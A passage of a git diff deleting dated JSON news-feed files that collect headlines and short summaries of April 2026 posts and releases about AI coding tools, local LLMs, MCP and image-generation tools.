"https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.91, - "date": "2026-04-15T23:04:00.000Z", - "summary": "Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows:\n\n* Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses.\n* Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get 
parsed. Deny / Allow / Always allow, with \"always allow\" writing to \\~/.claude/settings.json.\n* Every live session at a glance — project, model, uptime", - "category": "ai_tools" - }, - { - "title": "OpenClaw v2026.4.15 released", - "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.15", - "source": "GitHub Releases · OpenClaw", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-16T21:50:22.000Z", - "summary": "\n### Changes\n\n- Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7.\n- Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth.\n\n### Fixes\n\n- Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills.", - "category": "ai_tools" - }, - { - "title": "Crush v0.59.0 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.59.0", - "source": "GitHub Releases · Crush", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.84, - "date": "2026-04-16T21:21:52.000Z", - "summary": "## Changelog\n### New!\n* 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm)\n* b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh)\n* e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) (@andreynering)\n### Fixed\n* f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm", - "category": "ai_tools" - }, - { - "title": "Qwen3.6-35B is worse at tool use and reasoning loops 
than 3.5?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-16T22:09:37.000Z", - "summary": "Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself.\n\nIt’s ok on basic apps, but really struggles to move ahead on something more complex like ", - "category": "ai_models" - }, - { - "title": "PSA: Qwen3.6 ships with preserve_thinking. Make sure you have it on.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-16T19:41:55.000Z", - "summary": "I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful.\n\nQwen 3.6 now addresses this with a new preserve\\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B)\n\n>`please use \"preserve_thinking\": True instead of \"chat_template_kwargs\": {\"preserve_thinking", - "category": "ai_models" - }, - { - "title": "Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. 
You have nothing to lose at this point.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-16T18:54:41.000Z", - "summary": "Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this\n\nGoogle if you seeing this (prob. not) please open source it in I/O 2026\n\n \nEdit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it", - "category": "ai_models" - }, - { - "title": "Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings", - "url": "https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-16T18:25:26.000Z", - "summary": "Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text.\n\nThe idea: every AI agent today generates human text, parses it, then executes it. That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? 
Skip the text, emit machine ins", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-17.json b/data/news-feed-2026-04-17.json deleted file mode 100644 index d9f8d55..0000000 --- a/data/news-feed-2026-04-17.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.625Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-17", - "article_count": 15, - "archived_story_count": 370, - "articles": [ - { - "title": "Crush v0.60.0 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.60.0", - "source": "GitHub Releases · Crush", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-17T16:55:33.000Z", - "summary": "# Secret release\r\n\r\nYou're not supposed to read through the changelog below.\r\n\r\n## Changelog\r\n### New!\r\n* ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering)\r\n\r\n---\r\n\r\n
              \r\nVerifying the artifacts\r\n\r\nFirst, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/", - "category": "ai_tools" - }, - { - "title": "Adapt: open-source memory that rewrites its own structure when your data surprises it", - "url": "https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-17T12:48:26.000Z", - "summary": "TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. \n \nWorks with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. 
\n \nObserve and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s", - "category": "ai_models" - }, - { - "title": "Anthropic's AI protocol has critical flaw affecting 200,000 servers", - "url": "https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-17T10:29:36.000Z", - "summary": "https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/\n\nSecurity researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more", - "category": "ai_tools" - }, - { - "title": "OpenAI Codex Just Got Its Biggest Update Yet", - "url": "https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/", - "source": "Reddit r/ChatGPT", - "tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-17T02:27:24.000Z", - "summary": "OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. \n \nRecent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. 
\n \nApril 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and ", - "category": "ai_tools" - }, - { - "title": "[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client", - "url": "https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-17T00:03:20.000Z", - "summary": "I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork.\n\nWeb Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/)\n\n**MooshieUI Integration (Open Source)**\n\nFor those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, ", - "category": "creative_tools" - }, - { - "title": "How to Implement Karpathy's LLM Knowledge Base. Full Guide", - "url": "https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.98, - "date": "2026-04-17T14:45:37.000Z", - "summary": "karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup.\n\n**the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \\- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. 
markdown files, summaries, backlinks, categorized by concept. the llm writes", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.38.2 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-17T18:38:59.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2", - "category": "ai_tools" - }, - { - "title": "Vercel CLI vercel@51.7.0 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-17T22:38:37.000Z", - "summary": "### Minor Changes\n\n- [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895))\n\n- Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893))\n\n- [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920))\n\n### Patch Changes\n\n- Include `action` and `resource` fields from API 403 responses in non-", - "category": "ai_tools" - }, - { - "title": "Vercel CLI vercel@51.6.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.84, - "date": 
"2026-04-17T02:34:08.000Z", - "summary": "### Patch Changes\n\n- Updated dependencies \\[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]:\n - @vercel/build-utils@13.18.0\n - @vercel/backends@0.1.0\n - @vercel/python@6.34.0\n - @vercel/elysia@0.1.68\n - @vercel/express@0.1.78\n - @vercel/fastify@0.1.71\n - @vercel/go@3.5.0\n - @vercel/h3@0.1.77\n - @vercel/hono@0.2.71\n - @vercel/hydrogen@1.3.6\n - @vercel/koa@0.1.51", - "category": "ai_tools" - }, - { - "title": "CadQuery is an open-source Python library for building 3D CAD models", - "url": "https://cadquery.github.io/", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.84, - "date": "2026-04-14T23:20:39.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Qwen3.6 GGUF is so good for debugging.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-17T22:13:05.000Z", - "summary": "using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\\_0 kv cache (context window)", - "category": "ai_models" - }, - { - "title": "Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review", - "url": "https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-17T21:20:59.000Z", - "summary": "The R9700 is about 30% more than the B70, but it's more than 30% better. 
Overall, I rather have a R9700 than a B70.\n\n", - "category": "ai_models" - }, - { - "title": "Trying to Run LTX2.3 locally but getting an error", - "url": "https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-17T21:16:26.000Z", - "summary": "I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h", - "category": "creative_tools" - }, - { - "title": "Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time", - "url": "https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-17T17:04:24.000Z", - "summary": "I genuinely cannot believe what I'm watching unfold today\n\nAnthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it\n\nAnd the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. 
The writing was on the wal", - "category": "ai_tools" - }, - { - "title": "Fastest image to image model", - "url": "https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-17T17:00:09.000Z", - "summary": "Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more.", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-18.json b/data/news-feed-2026-04-18.json deleted file mode 100644 index eb464a3..0000000 --- a/data/news-feed-2026-04-18.json +++ /dev/null @@ -1,249 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.827Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-18", - "article_count": 15, - "archived_story_count": 256, - "articles": [ - { - "title": "[Update] GHOST v2.1: Full Native Windows Support is Live.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-18T20:07:31.000Z", - "summary": "FOR THE UNINITIATED:\n\nGHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. 
No Linux, no complex WSL2 setups, and no driver hacking required.\n\nKEY FEATURES\n\nFull Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer.\n\nAuto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture ", - "category": "ai_models" - }, - { - "title": "easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-18T14:13:28.000Z", - "summary": "https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d\n\nI have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use.\n\nHaving worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. For o", - "category": "ai_research" - }, - { - "title": "We’re proud to open-source LIDARLearn [R] [D] [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-18T10:36:59.000Z", - "summary": "It’s a unified PyTorch library for 3D point cloud deep learning. 
To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support.\n\nIt brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods.\n\nYou can run everything from a single YAML file with one simple command.\n\nOne of the best features: after training, you can automatically generate a publica", - "category": "ai_research" - }, - { - "title": "Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-18T01:03:58.000Z", - "summary": "I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix\n\n**Hardware:** Apple M3 Ultra, 256GB unified memory\n\n**Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK\n\n**Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B\n\n# The Agent Compatibility Matrix\n\nThis is the part I wish ", - "category": "ai_models" - }, - { - "title": "gpt can now control your entire computer like a humain", - "url": "https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/", - "source": "Reddit r/ChatGPT", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-17T23:55:34.000Z", - "summary": "Hey everyone, I built something called AriaOS and just open-sourced it. 
\n\nThe idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment.\n\nWhat made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local", - "category": "ai_tools" - }, - { - "title": "ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.", - "url": "https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/", - "source": "Reddit r/ChatGPT", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.94, - "date": "2026-04-18T19:39:29.000Z", - "summary": "You've probably asked ChatGPT a question about a game you're playing -- \"is this item worth keeping in D2R,\" \"why is my Factorio base bottlenecked,\" \"how does this card interaction work in Magic,\" -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense.\n\nI built **Savecraft** to fix that. 
It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess.\n\nFor example:\n\n* *", - "category": "ai_tools" - }, - { - "title": "Goose v1.31.0 released", - "url": "https://github.com/aaif-goose/goose/releases/tag/v1.31.0", - "source": "GitHub Releases · Goose", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.76, - "date": "2026-04-17T00:44:54.000Z", - "summary": "New version of Goose available.", - "category": "ai_tools" - }, - { - "title": "Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-18T19:37:17.000Z", - "summary": "Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users.\n\nHere's my docker compose file:\n\n services:\n vllm:\n image: vllm/vllm-openai:latest\n container_name: vllm\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n count: all\n capabilities: [gpu]\n environment:\n - VLLM_API_KEY", - "category": "ai_models" - }, - { - "title": "Are you guys actually using local tool calling or is it a collective prank?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-18T18:54:54.000Z", - "summary": "I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol\n\n 
\nQwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works.\n\n \nToday with Gemma4, it kept assuring me it cr", - "category": "ai_models" - }, - { - "title": "Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-18T18:27:30.000Z", - "summary": "Quick update on Lore, the local-first memory app I posted here around v0.1.0.\n\nIt's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine.\n\n\n\nv0.2.0 highlights:\n\n\n\n\\- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls\n\n in real time.\n\n\\- Embedding-model migration is now non-destructive. You can swap from\n\n nomic-embed to mxbai-embed (or whatever) without losing data; the new\n\n embeddingTableSync rebuilds in place ", - "category": "ai_models" - }, - { - "title": "EditAnything IC-LoRA - LTX-2.3", - "url": "https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-18T15:07:01.000Z", - "summary": "This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. 
It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints.\n\nThe current goal is not final polished production quality, but to explore:\n\n* edit-anything behavior\n* prompt-following\n* inference tradeoffs\n* synthetic dataset building, especially for **style data**\n\nThe model was trained around four mai", - "category": "creative_tools" - }, - { - "title": "Melodic Brotherhood - I Just Need to Know (video generated with open source tools)", - "url": "https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-18T14:30:57.000Z", - "summary": "Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing).\n\nOnly non-open source thing is the music, which is Suno.", - "category": "creative_tools" - }, - { - "title": "Has PP improved enough on m5 max to go for 128gb?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-18T14:28:50.000Z", - "summary": "Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models.\n\nThinking of upgrading to m5 max, just wondering what the sweet spot is for ram? 
Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding?", - "category": "ai_models" - }, - { - "title": "Built a program to track logistical intelligence using satellite data [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/", - "source": "Reddit r/MachineLearning", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-18T11:33:14.000Z", - "summary": "Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts.\n\nBut there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery.\n\nThe trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart.\n\nEverything stationary looks nor", - "category": "ai_research" - }, - { - "title": "Is there something like SETI for training open source models?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-18T11:30:33.000Z", - "summary": "Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think.\n\nWould it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? 
Is that a stupid idea?", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-19.json b/data/news-feed-2026-04-19.json deleted file mode 100644 index 548f97b..0000000 --- a/data/news-feed-2026-04-19.json +++ /dev/null @@ -1,245 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.079Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-19", - "article_count": 15, - "archived_story_count": 579, - "articles": [ - { - "title": "whats the best harness/app to use my llm with?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-19T12:08:16.000Z", - "summary": "would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app\n\nlooking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model.\n\nseeing things like hermes? cherry studio? good ol LM studio?", - "category": "ai_models" - }, - { - "title": "I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative quality", - "url": "https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-19T01:59:17.000Z", - "summary": "# Sum B+a+c+k+g+r+o+u+n+d:\n\nI've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. 
